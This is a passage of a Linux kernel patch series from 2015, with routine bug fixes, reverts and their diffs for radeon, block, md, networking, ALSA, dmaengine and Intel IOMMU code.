audio support" This reverts commit a10f0df0615abb194968fc08147f3cdd70fd5aa5. Fixes some systems at the expense of others. Need to properly fix the pll divider selection. bug: https://bugzilla.kernel.org/show_bug.cgi?id=99651 Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/atombios_crtc.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c index e597ffc26563..42b2ea3fdcf3 100644 --- a/drivers/gpu/drm/radeon/atombios_crtc.c +++ b/drivers/gpu/drm/radeon/atombios_crtc.c @@ -1798,9 +1798,7 @@ static int radeon_get_shared_nondp_ppll(struct drm_crtc *crtc) if ((crtc->mode.clock == test_crtc->mode.clock) && (adjusted_clock == test_adjusted_clock) && (radeon_crtc->ss_enabled == test_radeon_crtc->ss_enabled) && - (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID) && - (drm_detect_monitor_audio(radeon_connector_edid(test_radeon_crtc->connector)) == - drm_detect_monitor_audio(radeon_connector_edid(radeon_crtc->connector)))) + (test_radeon_crtc->pll_id != ATOM_PPLL_INVALID)) return test_radeon_crtc->pll_id; } } From ebb9bf18636926d5da97136c22e882c5d91fda73 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Wed, 10 Jun 2015 01:30:54 -0400 Subject: [PATCH 829/872] Revert "drm/radeon: adjust pll when audio is not enabled" This reverts commit 7fe04d6fa824ccea704535a597dc417c8687f990. Fixes some systems at the expense of others. Need to properly fix the pll divider selection. bug: https://bugzilla.kernel.org/show_bug.cgi?id=99651 Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/atombios_crtc.c | 3 --- 1 file changed, 3 deletions(-) diff --git a/drivers/gpu/drm/radeon/atombios_crtc.c b/drivers/gpu/drm/radeon/atombios_crtc.c index 42b2ea3fdcf3..dac78ad24b31 100644 --- a/drivers/gpu/drm/radeon/atombios_crtc.c +++ b/drivers/gpu/drm/radeon/atombios_crtc.c @@ -580,9 +580,6 @@ static u32 atombios_adjust_pll(struct drm_crtc *crtc, else radeon_crtc->pll_flags |= RADEON_PLL_PREFER_LOW_REF_DIV; - /* if there is no audio, set MINM_OVER_MAXP */ - if (!drm_detect_monitor_audio(radeon_connector_edid(connector))) - radeon_crtc->pll_flags |= RADEON_PLL_PREFER_MINM_OVER_MAXP; if (rdev->family < CHIP_RV770) radeon_crtc->pll_flags |= RADEON_PLL_PREFER_MINM_OVER_MAXP; /* use frac fb div on APUs */ From ee18e599251ed06bf0c8ade7c434a0de311342ca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Michel=20D=C3=A4nzer?= Date: Thu, 11 Jun 2015 18:38:38 +0900 Subject: [PATCH 830/872] drm/radeon: Make sure radeon_vm_bo_set_addr always unreserves the BO MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Some error paths didn't unreserve the BO. This resulted in a deadlock down the road on the next attempt to reserve the (still reserved) BO. Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=90873 Cc: stable@vger.kernel.org Reviewed-by: Christian König Signed-off-by: Michel Dänzer Signed-off-by: Alex Deucher --- drivers/gpu/drm/radeon/radeon_vm.c | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/drivers/gpu/drm/radeon/radeon_vm.c b/drivers/gpu/drm/radeon/radeon_vm.c index de42fc4a22b8..9c3377ca17b7 100644 --- a/drivers/gpu/drm/radeon/radeon_vm.c +++ b/drivers/gpu/drm/radeon/radeon_vm.c @@ -458,14 +458,16 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, /* make sure object fit at this offset */ eoffset = soffset + size; if (soffset >= eoffset) { - return -EINVAL; + r = -EINVAL; + goto error_unreserve; } last_pfn = eoffset / RADEON_GPU_PAGE_SIZE; if (last_pfn > rdev->vm_manager.max_pfn) { dev_err(rdev->dev, "va above limit (0x%08X > 0x%08X)\n", last_pfn, rdev->vm_manager.max_pfn); - return -EINVAL; + r = -EINVAL; + goto error_unreserve; } } else { @@ -486,7 +488,8 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, "(bo %p 0x%010lx 0x%010lx)\n", bo_va->bo, soffset, tmp->bo, tmp->it.start, tmp->it.last); mutex_unlock(&vm->mutex); - return -EINVAL; + r = -EINVAL; + goto error_unreserve; } } @@ -497,7 +500,8 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, tmp = kzalloc(sizeof(struct radeon_bo_va), GFP_KERNEL); if (!tmp) { mutex_unlock(&vm->mutex); - return -ENOMEM; + r = -ENOMEM; + goto error_unreserve; } tmp->it.start = bo_va->it.start; tmp->it.last = bo_va->it.last; @@ -555,7 +559,6 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, r = radeon_vm_clear_bo(rdev, pt); if (r) { radeon_bo_unref(&pt); - radeon_bo_reserve(bo_va->bo, false); return r; } @@ -575,6 +578,10 @@ int radeon_vm_bo_set_addr(struct radeon_device *rdev, mutex_unlock(&vm->mutex); return 0; + +error_unreserve: + radeon_bo_unreserve(bo_va->bo); + return r; } /** From 4d66e5e9b6d720d8463e11d027bd4ad91c8b1318 Mon Sep 17 00:00:00 2001 From: Dan Williams Date: Wed, 10 Jun 2015 23:47:14 -0400 Subject: [PATCH 831/872] block: fix ext_dev_lock lockdep report ================================= [ INFO: inconsistent lock state ] 4.1.0-rc7+ #217 Tainted: G O --------------------------------- inconsistent {SOFTIRQ-ON-W} -> {IN-SOFTIRQ-W} usage. swapper/6/0 [HC0[0]:SC1[1]:HE1:SE0] takes: (ext_devt_lock){+.?...}, at: [] blk_free_devt+0x3c/0x70 {SOFTIRQ-ON-W} state was registered at: [] __lock_acquire+0x461/0x1e70 [] lock_acquire+0xb7/0x290 [] _raw_spin_lock+0x38/0x50 [] blk_alloc_devt+0x6d/0xd0 <-- take the lock in process context [..] [] __lock_acquire+0x3fe/0x1e70 [] ? __lock_acquire+0xe5d/0x1e70 [] lock_acquire+0xb7/0x290 [] ? blk_free_devt+0x3c/0x70 [] _raw_spin_lock+0x38/0x50 [] ? blk_free_devt+0x3c/0x70 [] blk_free_devt+0x3c/0x70 <-- take the lock in softirq [] part_release+0x1c/0x50 [] device_release+0x36/0xb0 [] kobject_cleanup+0x7b/0x1a0 [] kobject_put+0x30/0x70 [] put_device+0x17/0x20 [] delete_partition_rcu_cb+0x16c/0x180 [] ? read_dev_sector+0xa0/0xa0 [] rcu_process_callbacks+0x2ff/0xa90 [] ? rcu_process_callbacks+0x2bf/0xa90 [] __do_softirq+0xde/0x600 Neil sees this in his tests and it also triggers on pmem driver unbind for the libnvdimm tests. This fix is on top of an initial fix by Keith for incorrect usage of mutex_lock() in this path: 2da78092dda1 "block: Fix dev_t minor allocation lifetime". Both this and 2da78092dda1 are candidates for -stable. Fixes: 2da78092dda1 ("block: Fix dev_t minor allocation lifetime") Cc: Cc: Keith Busch Reported-by: NeilBrown Signed-off-by: Dan Williams Signed-off-by: Jens Axboe --- block/genhd.c | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/block/genhd.c b/block/genhd.c index 666e11b83983..ea982eadaf63 100644 --- a/block/genhd.c +++ b/block/genhd.c @@ -422,9 +422,9 @@ int blk_alloc_devt(struct hd_struct *part, dev_t *devt) /* allocate ext devt */ idr_preload(GFP_KERNEL); - spin_lock(&ext_devt_lock); + spin_lock_bh(&ext_devt_lock); idx = idr_alloc(&ext_devt_idr, part, 0, NR_EXT_DEVT, GFP_NOWAIT); - spin_unlock(&ext_devt_lock); + spin_unlock_bh(&ext_devt_lock); idr_preload_end(); if (idx < 0) @@ -449,9 +449,9 @@ void blk_free_devt(dev_t devt) return; if (MAJOR(devt) == BLOCK_EXT_MAJOR) { - spin_lock(&ext_devt_lock); + spin_lock_bh(&ext_devt_lock); idr_remove(&ext_devt_idr, blk_mangle_minor(MINOR(devt))); - spin_unlock(&ext_devt_lock); + spin_unlock_bh(&ext_devt_lock); } } @@ -690,13 +690,13 @@ struct gendisk *get_gendisk(dev_t devt, int *partno) } else { struct hd_struct *part; - spin_lock(&ext_devt_lock); + spin_lock_bh(&ext_devt_lock); part = idr_find(&ext_devt_idr, blk_mangle_minor(MINOR(devt))); if (part && get_disk(part_to_disk(part))) { *partno = part->partno; disk = part_to_disk(part); } - spin_unlock(&ext_devt_lock); + spin_unlock_bh(&ext_devt_lock); } return disk; From b6f2098fb708ce935a59763178c4e8cd942fcf88 Mon Sep 17 00:00:00 2001 From: Richard Weinberger Date: Mon, 4 May 2015 20:58:57 +0200 Subject: [PATCH 832/872] block: pmem: Add dependency on HAS_IOMEM MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Not all architectures have io memory. Fixes: drivers/block/pmem.c: In function ‘pmem_alloc’: drivers/block/pmem.c:146:2: error: implicit declaration of function ‘ioremap_nocache’ [-Werror=implicit-function-declaration] pmem->virt_addr = ioremap_nocache(pmem->phys_addr, pmem->size); ^ drivers/block/pmem.c:146:18: warning: assignment makes pointer from integer without a cast [enabled by default] pmem->virt_addr = ioremap_nocache(pmem->phys_addr, pmem->size); ^ drivers/block/pmem.c:182:2: error: implicit declaration of function ‘iounmap’ [-Werror=implicit-function-declaration] iounmap(pmem->virt_addr); ^ Signed-off-by: Richard Weinberger Reviewed-by: Ross Zwisler Signed-off-by: Jens Axboe --- drivers/block/Kconfig | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/block/Kconfig b/drivers/block/Kconfig index eb1fed5bd516..3ccef9eba6f9 100644 --- a/drivers/block/Kconfig +++ b/drivers/block/Kconfig @@ -406,6 +406,7 @@ config BLK_DEV_RAM_DAX config BLK_DEV_PMEM tristate "Persistent memory block device support" + depends on HAS_IOMEM help Saying Y here will allow you to use a contiguous range of reserved memory as one or more persistent block devices. From 58c98be137830d34b79024cc5dc95ef54fcd7ffe Mon Sep 17 00:00:00 2001 From: Richard Cochran Date: Thu, 11 Jun 2015 14:51:30 +0200 Subject: [PATCH 833/872] net: igb: fix the start time for periodic output signals When programming the start of a periodic output, the code wrongly places the seconds value into the "low" register and the nanoseconds into the "high" register. Even though this is backwards, it slipped through my testing, because the re-arming code in the interrupt service routine is correct, and the signal does appear starting with the second edge. This patch fixes the issue by programming the registers correctly. Signed-off-by: Richard Cochran Reviewed-by: Jacob Keller Acked-by: Jeff Kirsher Signed-off-by: David S. Miller --- drivers/net/ethernet/intel/igb/igb_ptp.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/intel/igb/igb_ptp.c b/drivers/net/ethernet/intel/igb/igb_ptp.c index e3b9b63ad010..c3a9392cbc19 100644 --- a/drivers/net/ethernet/intel/igb/igb_ptp.c +++ b/drivers/net/ethernet/intel/igb/igb_ptp.c @@ -538,8 +538,8 @@ static int igb_ptp_feature_enable_i210(struct ptp_clock_info *ptp, igb->perout[i].start.tv_nsec = rq->perout.start.nsec; igb->perout[i].period.tv_sec = ts.tv_sec; igb->perout[i].period.tv_nsec = ts.tv_nsec; - wr32(trgttiml, rq->perout.start.sec); - wr32(trgttimh, rq->perout.start.nsec); + wr32(trgttimh, rq->perout.start.sec); + wr32(trgttiml, rq->perout.start.nsec); tsauxc |= tsauxc_mask; tsim |= tsim_mask; } else { From 0fae3bf018d97b210051c8797a49d66d31071847 Mon Sep 17 00:00:00 2001 From: Robert Shearman Date: Thu, 11 Jun 2015 19:58:26 +0100 Subject: [PATCH 834/872] mpls: handle device renames for per-device sysctls If a device is renamed and the original name is subsequently reused for a new device, the following warning is generated: sysctl duplicate entry: /net/mpls/conf/veth0//input CPU: 3 PID: 1379 Comm: ip Not tainted 4.1.0-rc4+ #20 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.7.5-20140531_083030-gandalf 04/01/2014 0000000000000000 0000000000000000 ffffffff81566aaf 0000000000000000 ffffffff81236279 ffff88002f7d7f00 0000000000000000 ffff88000db336d8 ffff88000db33698 0000000000000005 ffff88002e046000 ffff8800168c9280 Call Trace: [] ? dump_stack+0x40/0x50 [] ? __register_sysctl_table+0x289/0x5a0 [] ? mpls_dev_notify+0x1ff/0x300 [mpls_router] [] ? notifier_call_chain+0x4f/0x70 [] ? register_netdevice+0x2b2/0x480 [] ? veth_newlink+0x178/0x2d3 [veth] [] ? rtnl_newlink+0x73c/0x8e0 [] ? rtnl_newlink+0x16a/0x8e0 [] ? __kmalloc_reserve.isra.30+0x32/0x90 [] ? rtnetlink_rcv_msg+0x8d/0x250 [] ? __alloc_skb+0x47/0x1f0 [] ? __netlink_lookup+0xab/0xe0 [] ? rtnetlink_rcv+0x30/0x30 [] ? netlink_rcv_skb+0xb0/0xd0 [] ? rtnetlink_rcv+0x24/0x30 [] ? netlink_unicast+0x107/0x1a0 [] ? netlink_sendmsg+0x50e/0x630 [] ? sock_sendmsg+0x3c/0x50 [] ? ___sys_sendmsg+0x27b/0x290 [] ? mem_cgroup_try_charge+0x88/0x110 [] ? mem_cgroup_commit_charge+0x56/0xa0 [] ? do_filp_open+0x30/0xa0 [] ? __sys_sendmsg+0x3e/0x80 [] ? system_call_fastpath+0x16/0x75 Fix this by unregistering the previous sysctl table (registered for the path containing the original device name) and re-registering the table for the path containing the new device name. Fixes: 37bde79979c3 ("mpls: Per-device enabling of packet input") Reported-by: Scott Feldman Signed-off-by: Robert Shearman Signed-off-by: David S. Miller --- net/mpls/af_mpls.c | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/net/mpls/af_mpls.c b/net/mpls/af_mpls.c index bff427f31924..1f93a5978f2a 100644 --- a/net/mpls/af_mpls.c +++ b/net/mpls/af_mpls.c @@ -564,6 +564,17 @@ static int mpls_dev_notify(struct notifier_block *this, unsigned long event, case NETDEV_UNREGISTER: mpls_ifdown(dev); break; + case NETDEV_CHANGENAME: + mdev = mpls_dev_get(dev); + if (mdev) { + int err; + + mpls_dev_sysctl_unregister(mdev); + err = mpls_dev_sysctl_register(dev, mdev); + if (err) + return notifier_from_errno(err); + } + break; } return NOTIFY_OK; } From fb05e7a89f500cfc06ae277bdc911b281928995d Mon Sep 17 00:00:00 2001 From: Shaohua Li Date: Thu, 11 Jun 2015 16:50:48 -0700 Subject: [PATCH 835/872] net: don't wait for order-3 page allocation We saw excessive direct memory compaction triggered by skb_page_frag_refill. This causes performance issues and add latency. Commit 5640f7685831e0 introduces the order-3 allocation. According to the changelog, the order-3 allocation isn't a must-have but to improve performance. But direct memory compaction has high overhead. The benefit of order-3 allocation can't compensate the overhead of direct memory compaction. This patch makes the order-3 page allocation atomic. If there is no memory pressure and memory isn't fragmented, the alloction will still success, so we don't sacrifice the order-3 benefit here. If the atomic allocation fails, direct memory compaction will not be triggered, skb_page_frag_refill will fallback to order-0 immediately, hence the direct memory compaction overhead is avoided. In the allocation failure case, kswapd is waken up and doing compaction, so chances are allocation could success next time. alloc_skb_with_frags is the same. The mellanox driver does similar thing, if this is accepted, we must fix the driver too. V3: fix the same issue in alloc_skb_with_frags as pointed out by Eric V2: make the changelog clearer Cc: Eric Dumazet Cc: Chris Mason Cc: Debabrata Banerjee Signed-off-by: Shaohua Li Acked-by: Eric Dumazet Signed-off-by: David S. Miller --- net/core/skbuff.c | 2 +- net/core/sock.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/net/core/skbuff.c b/net/core/skbuff.c index 3cfff2a3d651..41ec02242ea7 100644 --- a/net/core/skbuff.c +++ b/net/core/skbuff.c @@ -4398,7 +4398,7 @@ struct sk_buff *alloc_skb_with_frags(unsigned long header_len, while (order) { if (npages >= 1 << order) { - page = alloc_pages(gfp_mask | + page = alloc_pages((gfp_mask & ~__GFP_WAIT) | __GFP_COMP | __GFP_NOWARN | __GFP_NORETRY, diff --git a/net/core/sock.c b/net/core/sock.c index 469d6039c7f5..dc30dc5bb1b8 100644 --- a/net/core/sock.c +++ b/net/core/sock.c @@ -1880,7 +1880,7 @@ bool skb_page_frag_refill(unsigned int sz, struct page_frag *pfrag, gfp_t gfp) pfrag->offset = 0; if (SKB_FRAG_PAGE_ORDER) { - pfrag->page = alloc_pages(gfp | __GFP_COMP | + pfrag->page = alloc_pages((gfp & ~__GFP_WAIT) | __GFP_COMP | __GFP_NOWARN | __GFP_NORETRY, SKB_FRAG_PAGE_ORDER); if (likely(pfrag->page)) { From 535115b5ff51c702a9a22feb918707c2fe1fbd17 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Fri, 12 Jun 2015 07:53:58 +0200 Subject: [PATCH 836/872] ALSA: hda - Abort the probe without i915 binding for HSW/BDW The previous patch tried to continue the probe if i915 binding fails. For for simplicity reason, we haven't implemented abort even for controller chips that are dedicated for HDMI/DP on HSW and BDW. However, Mengdong suggested that this can be dangerous; BIOS may disable gfx power well although the PCI entry for HD-audio is left, and this may result in the unexpected behavior, kernel errors, etc. For avoiding this situation, abort the probe at i915 binding failure only for HSW/BDW chips selectively. For other chips, it still continues. Fixes: bf06848bdbe5 ('ALSA: hda - Continue probing even if i915 binding fails') Reported-by: Mengdong Lin Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_intel.c | 18 ++++++++++++++++-- 1 file changed, 16 insertions(+), 2 deletions(-) diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c index 8a0af6770e1d..a244ba706317 100644 --- a/sound/pci/hda/hda_intel.c +++ b/sound/pci/hda/hda_intel.c @@ -340,6 +340,11 @@ enum { #define use_vga_switcheroo(chip) 0 #endif +#define CONTROLLER_IN_GPU(pci) (((pci)->device == 0x0a0c) || \ + ((pci)->device == 0x0c0c) || \ + ((pci)->device == 0x0d0c) || \ + ((pci)->device == 0x160c)) + static char *driver_short_names[] = { [AZX_DRIVER_ICH] = "HDA Intel", [AZX_DRIVER_PCH] = "HDA Intel PCH", @@ -1854,8 +1859,17 @@ static int azx_probe_continue(struct azx *chip) if (chip->driver_caps & AZX_DCAPS_I915_POWERWELL) { #ifdef CONFIG_SND_HDA_I915 err = hda_i915_init(hda); - if (err < 0) - goto skip_i915; + if (err < 0) { + /* if the controller is bound only with HDMI/DP + * (for HSW and BDW), we need to abort the probe; + * for other chips, still continue probing as other + * codecs can be on the same link. + */ + if (CONTROLLER_IN_GPU(pci)) + goto out_free; + else + goto skip_i915; + } err = hda_display_power(hda, true); if (err < 0) { dev_err(chip->card->dev, From 88d04643c66052a1cf92a6fd5f92dff0f7757f61 Mon Sep 17 00:00:00 2001 From: Krzysztof Kozlowski Date: Wed, 10 Jun 2015 17:17:07 +0900 Subject: [PATCH 837/872] dmaengine: Fix choppy sound because of unimplemented resume Some drivers implement only pause operation (no resuming). Example is pl330 where pause is needed for getting residuum. pl330 does not support resume operation, transfer must be stopped after pause. However for slaves this is exposed always as "pause and resume" which introduces subtle errors on Odroid U3 board (Exynos4412 with pl330). After adding pause function to pl330 driver the audio playback (utilizing DMA) gets choppy after some time (approximately 24 hours). Fix this by exposing "cmd_pause" if and only if pause and resume are implemented. Signed-off-by: Krzysztof Kozlowski Reported-by: gabriel@unseen.is Reported-by: Marek Szyprowski Cc: Fixes: 88987d2c7534 ("dmaengine: pl330: add DMA_PAUSE feature") Acked-by: Maxime Ripard Signed-off-by: Vinod Koul --- drivers/dma/dmaengine.c | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/drivers/dma/dmaengine.c b/drivers/dma/dmaengine.c index 2890d744bb1b..3ddfd1f6c23c 100644 --- a/drivers/dma/dmaengine.c +++ b/drivers/dma/dmaengine.c @@ -487,7 +487,11 @@ int dma_get_slave_caps(struct dma_chan *chan, struct dma_slave_caps *caps) caps->directions = device->directions; caps->residue_granularity = device->residue_granularity; - caps->cmd_pause = !!device->device_pause; + /* + * Some devices implement only pause (e.g. to get residuum) but no + * resume. However cmd_pause is advertised as pause AND resume. + */ + caps->cmd_pause = !!(device->device_pause && device->device_resume); caps->cmd_terminate = !!device->device_terminate_all; return 0; From c008f1d356277a5b7561040596a073d87e56b0c8 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 12 Jun 2015 19:46:44 +1000 Subject: [PATCH 838/872] md: don't return 0 from array_state_store Returning zero from a 'store' function is bad. The return value should be either len length of the string or an error. So use 'len' if 'err' is zero. Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.") Signed-off-by: NeilBrown Cc: stable@vger.kernel (v4.0+) --- drivers/md/md.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/md/md.c b/drivers/md/md.c index 27506302eb7a..dd59d71ade2f 100644 --- a/drivers/md/md.c +++ b/drivers/md/md.c @@ -3834,7 +3834,7 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len) err = -EBUSY; } spin_unlock(&mddev->lock); - return err; + return err ?: len; } err = mddev_lock(mddev); if (err) From 8e8e2518fceca407bb8fc2a6710d19d2e217892e Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 12 Jun 2015 19:51:27 +1000 Subject: [PATCH 839/872] md: Close race when setting 'action' to 'idle'. Checking ->sync_thread without holding the mddev_lock() isn't really safe, even after flushing the workqueue which ensures md_start_sync() has been run. While this code is waiting for the lock, md_check_recovery could reap the thread itself, and then start another thread (e.g. recovery might finish, then reshape starts). When this thread gets the lock md_start_sync() hasn't run so it doesn't get reaped, but MD_RECOVERY_RUNNING gets cleared. This allows two threads to start which leads to confusion. So don't both if MD_RECOVERY_RUNNING isn't set, but if it is do the flush and the test and the reap all under the mddev_lock to avoid any race with md_check_recovery. Signed-off-by: NeilBrown Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.") Cc: stable@vger.kernel.org (v4.0+) --- drivers/md/md.c | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/drivers/md/md.c b/drivers/md/md.c index dd59d71ade2f..8d4408baa428 100644 --- a/drivers/md/md.c +++ b/drivers/md/md.c @@ -4217,13 +4217,14 @@ action_store(struct mddev *mddev, const char *page, size_t len) set_bit(MD_RECOVERY_FROZEN, &mddev->recovery); else clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); - flush_workqueue(md_misc_wq); - if (mddev->sync_thread) { - set_bit(MD_RECOVERY_INTR, &mddev->recovery); - if (mddev_lock(mddev) == 0) { + if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery) && + mddev_lock(mddev) == 0) { + flush_workqueue(md_misc_wq); + if (mddev->sync_thread) { + set_bit(MD_RECOVERY_INTR, &mddev->recovery); md_reap_sync_thread(mddev); - mddev_unlock(mddev); } + mddev_unlock(mddev); } } else if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery) || test_bit(MD_RECOVERY_NEEDED, &mddev->recovery)) From ea358cd0d2c634ff1379a1392edcdf2289f31e13 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 12 Jun 2015 20:05:04 +1000 Subject: [PATCH 840/872] md: make sure MD_RECOVERY_DONE is clear before starting recovery/resync MD_RECOVERY_DONE is normally cleared by md_check_recovery after a resync etc finished. However it is possible for raid5_start_reshape to race and start a reshape before MD_RECOVERY_DONE is cleared. This can lean to multiple reshapes running at the same time, which isn't good. To make sure it is cleared before starting a reshape, and also clear it when reaping a thread, just to be safe. Signed-off-by: NeilBrown --- drivers/md/md.c | 1 + drivers/md/raid10.c | 1 + drivers/md/raid5.c | 1 + 3 files changed, 3 insertions(+) diff --git a/drivers/md/md.c b/drivers/md/md.c index 8d4408baa428..4dbed4a67aaf 100644 --- a/drivers/md/md.c +++ b/drivers/md/md.c @@ -8262,6 +8262,7 @@ void md_reap_sync_thread(struct mddev *mddev) if (mddev_is_clustered(mddev)) md_cluster_ops->metadata_update_finish(mddev); clear_bit(MD_RECOVERY_RUNNING, &mddev->recovery); + clear_bit(MD_RECOVERY_DONE, &mddev->recovery); clear_bit(MD_RECOVERY_SYNC, &mddev->recovery); clear_bit(MD_RECOVERY_RESHAPE, &mddev->recovery); clear_bit(MD_RECOVERY_REQUESTED, &mddev->recovery); diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c index e793ab6b3570..f55c3f35b746 100644 --- a/drivers/md/raid10.c +++ b/drivers/md/raid10.c @@ -4156,6 +4156,7 @@ static int raid10_start_reshape(struct mddev *mddev) clear_bit(MD_RECOVERY_SYNC, &mddev->recovery); clear_bit(MD_RECOVERY_CHECK, &mddev->recovery); + clear_bit(MD_RECOVERY_DONE, &mddev->recovery); set_bit(MD_RECOVERY_RESHAPE, &mddev->recovery); set_bit(MD_RECOVERY_RUNNING, &mddev->recovery); diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 553d54b87052..b6793d2e051f 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -7354,6 +7354,7 @@ static int raid5_start_reshape(struct mddev *mddev) clear_bit(MD_RECOVERY_SYNC, &mddev->recovery); clear_bit(MD_RECOVERY_CHECK, &mddev->recovery); + clear_bit(MD_RECOVERY_DONE, &mddev->recovery); set_bit(MD_RECOVERY_RESHAPE, &mddev->recovery); set_bit(MD_RECOVERY_RUNNING, &mddev->recovery); mddev->sync_thread = md_register_thread(md_do_sync, mddev, From c83b2f20fdde578bded3dfc4405c5db7a039c694 Mon Sep 17 00:00:00 2001 From: David Woodhouse Date: Fri, 12 Jun 2015 10:15:49 +0100 Subject: [PATCH 841/872] iommu/vt-d: Only enable extended context tables if PASID is supported Although the extended tables are theoretically a completely orthogonal feature to PASID and anything else that *uses* the newly-available bits, some of the early hardware has problems even when all we do is enable them and use only the same bits that were in the old context tables. For now, there's no motivation to support extended tables unless we're going to use PASID support to do SVM. So just don't use them unless PASID support is advertised too. Also add a command-line bailout just in case later chips also have issues. The equivalent problem for PASID support has already been fixed with the upcoming VT-d spec update and commit bd00c606a ("iommu/vt-d: Change PASID support to bit 40 of Extended Capability Register"), because the problematic platforms use the old definition of the PASID-capable bit, which is now marked as reserved and meaningless. So with this change, we'll magically start using ECS again only when we see the new hardware advertising "hey, we have PASID support and we actually tested it this time" on bit 40. The VT-d hardware architect has promised that we are not going to have any reason to support ECS *without* PASID any time soon, and he'll make sure he checks with us before changing that. In the future, if hypothetical new features also use new bits in the context tables and can be seen on implementations *without* PASID support, we might need to add their feature bits to the ecs_enabled() macro. Signed-off-by: David Woodhouse --- Documentation/kernel-parameters.txt | 6 ++++++ drivers/iommu/intel-iommu.c | 18 +++++++++++++++--- 2 files changed, 21 insertions(+), 3 deletions(-) diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt index f6befa9855c1..491bb15620fc 100644 --- a/Documentation/kernel-parameters.txt +++ b/Documentation/kernel-parameters.txt @@ -1481,6 +1481,12 @@ bytes respectively. Such letter suffixes can also be entirely omitted. By default, super page will be supported if Intel IOMMU has the capability. With this option, super page will not be supported. + ecs_off [Default Off] + By default, extended context tables will be supported if + the hardware advertises that it has support both for the + extended tables themselves, and also PASID support. With + this option set, extended tables will not be used even + on hardware which claims to support them. intel_idle.max_cstate= [KNL,HW,ACPI,X86] 0 disables intel_idle and fall back on acpi_idle. diff --git a/drivers/iommu/intel-iommu.c b/drivers/iommu/intel-iommu.c index 2ffe58969944..5ecfaf29933a 100644 --- a/drivers/iommu/intel-iommu.c +++ b/drivers/iommu/intel-iommu.c @@ -422,6 +422,14 @@ static int dmar_map_gfx = 1; static int dmar_forcedac; static int intel_iommu_strict; static int intel_iommu_superpage = 1; +static int intel_iommu_ecs = 1; + +/* We only actually use ECS when PASID support (on the new bit 40) + * is also advertised. Some early implementations — the ones with + * PASID support on bit 28 — have issues even when we *only* use + * extended root/context tables. */ +#define ecs_enabled(iommu) (intel_iommu_ecs && ecap_ecs(iommu->ecap) && \ + ecap_pasid(iommu->ecap)) int intel_iommu_gfx_mapped; EXPORT_SYMBOL_GPL(intel_iommu_gfx_mapped); @@ -465,6 +473,10 @@ static int __init intel_iommu_setup(char *str) printk(KERN_INFO "Intel-IOMMU: disable supported super page\n"); intel_iommu_superpage = 0; + } else if (!strncmp(str, "ecs_off", 7)) { + printk(KERN_INFO + "Intel-IOMMU: disable extended context table support\n"); + intel_iommu_ecs = 0; } str += strcspn(str, ","); @@ -669,7 +681,7 @@ static inline struct context_entry *iommu_context_addr(struct intel_iommu *iommu struct context_entry *context; u64 *entry; - if (ecap_ecs(iommu->ecap)) { + if (ecs_enabled(iommu)) { if (devfn >= 0x80) { devfn -= 0x80; entry = &root->hi; @@ -806,7 +818,7 @@ static void free_context_table(struct intel_iommu *iommu) if (context) free_pgtable_page(context); - if (!ecap_ecs(iommu->ecap)) + if (!ecs_enabled(iommu)) continue; context = iommu_context_addr(iommu, i, 0x80, 0); @@ -1141,7 +1153,7 @@ static void iommu_set_root_entry(struct intel_iommu *iommu) unsigned long flag; addr = virt_to_phys(iommu->root_entry); - if (ecap_ecs(iommu->ecap)) + if (ecs_enabled(iommu)) addr |= DMA_RTADDR_RTT; raw_spin_lock_irqsave(&iommu->register_lock, flag); From ae36806a622aea5ac79f279cfccc82144967b6e7 Mon Sep 17 00:00:00 2001 From: Marcelo Ricardo Leitner Date: Thu, 11 Jun 2015 14:49:46 -0300 Subject: [PATCH 842/872] sctp: allow authenticating DATA chunks that are bundled with COOKIE_ECHO Currently, we can ask to authenticate DATA chunks and we can send DATA chunks on the same packet as COOKIE_ECHO, but if you try to combine both, the DATA chunk will be sent unauthenticated and peer won't accept it, leading to a communication failure. This happens because even though the data was queued after it was requested to authenticate DATA chunks, it was also queued before we could know that remote peer can handle authenticating, so sctp_auth_send_cid() returns false. The fix is whenever we set up an active key, re-check send queue for chunks that now should be authenticated. As a result, such packet will now contain COOKIE_ECHO + AUTH + DATA chunks, in that order. 